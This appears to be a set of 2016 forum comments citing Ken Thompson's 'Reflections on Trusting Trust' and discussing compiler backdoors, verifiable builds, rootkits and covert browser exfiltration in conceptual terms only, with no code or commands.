Jul 11, 2016

"Reflections on Trusting Trust", Ken Thompson.


Jul 08, 2016

> There is a trusting trust issue here, of course.

In case anyone doesn't know, this is referencing a famous paper:


Some further discussion: https://www.schneier.com/blog/archives/2006/01/countering_tr...

Jun 09, 2016

So, it has come to this: https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thomp... (Ken Thompson "Reflections on Trusting Trust") in real life...

May 25, 2016

The Ken Thompson thing is presumably in reference to his popular piece "Reflections on Trusting Trust" (https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thomp...)

As the level of program gets lower, these bugs will be harder and harder to detect. A well installed microcode bug will be almost impossible to detect.

And this is even lower - in the hardware itself.

Really fascinating work.

May 25, 2016

Ken Thompson gave a lecture called "Reflections on Trusting Trust" [1] in 1984 that outlines a similar attack.

[1] https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thomp...

May 25, 2016

This link (pdf) provides the missing context: https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thomp...

May 12, 2016

> PS: who cares if the devs are using unsigned software downloaded over HTTP? I care about using signed software (and then I suppose the transport doesn't really matter), but that's totally unrelated to what the devs do on their own computers.

This is definitely a vector that attackers can and do use. If the developer is infected, particularly by a virus that changes the compiler to emit infected code, this can by proxy infect the products they develop.

See e.g.:


May 08, 2016

My money's on, he hasn't reviewed all the lines of code in the Bitcoin client (or operating system, even!) he's running, either, so...trust comes back in a different form.

In a way, it reminds me of the ol' Reflections on trusting trust (https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thomp...), but in a somewhat broader sense.

For my part, really, at the end of the day, I'd sooner trust institutions that have been around for a long, long time (far longer than I've been alive so far) than a coding project that's been around for less time than most of the popular websites I read.

But it'd be a funny old world if we were all alike, of course.

Apr 01, 2016

There are two trust problems that verifiable builds are supposed to solve:

1. Did the authors manipulate the source code compared to what they published?

2. Did a third party manipulate the binaries on the distribution channel?

The process of verifying a build can be done through a Docker image containing an Android build environment that we've published.

For the verification, you now depend on a complex binary blob provided by the authors, that is distributed through a different channel (Docker images instead of Google Play).

This is a good solution to the second problem, but it does not preclude OWS insiders from injecting malicious code (they merely need to add the backdoor at the SDK level[0] and use that same SDK for the public releases). Such a manipulation could be performed by an evil insider, or be part of a "government cooperation". I am not saying that OWS is or will be doing this. This is merely an observation of the shortcomings of the overall solution.

[0] "Reflections on Trusting Trust" https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thomp...

Mar 20, 2016

The attacker is not going to keep the SHA256 hashes, but the whole of the original /boot. (Where, you're asking? Anywhere you forgot Ring 0 could store data, and a few places you never even knew about.) Subsequently, he will intercept system calls to open(2) and friends, and serve the saved data. This is a fairly old technique: on the first page of a Google search[1], you can find a Phrack article from 2009[2]. In fact the seminal work I believe is Reflections on Trusting Trust by Ken Thompson, set in print in 1984.

[1] https://www.google.co.uk/search?q=rootkit+intercepting+open+...

[2] http://phrack.org/issues/66/16.html

[3] https://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-thomp...

Jan 11, 2016

Readable text format at a much lower level of abstraction than javascript currently is at right now. Different is different.

It's not so much about spying on your computer and gaining extra access, it's obvious (short of implementation bugs) that you won't gain any additional privileges that way.

But what you will gain is a way to obfuscate extremely well "report such and such to some webserver" in a way that's difficult to detect. For example, you can hide the entropy inside of a fairly innocent looking URL and without a lot of digging you won't know what that entropy represents. It can look like just a plain jane resource request and the webserver can serve up the exact same resource no matter what the entropy is, but also record that entropy for a back-channel way of exfiltrating information from your browser.

Finally, it opens up a whole new world of compiler attack. Right now the attacks against wordpress involve writing some information into a file and making it look "weird but I don't know what it does so I'd better not touch it".

What happens when breaking into a wordpress install means that you can execute the equivalent of the untraceable compiler login exploit insertion attack? You can't perform this attack without 1) a compiler and 2) a low level target that's hard to understand. You don't even need to perform a stage 3 attack which is the most sophisticated, a stage 2 would do fine.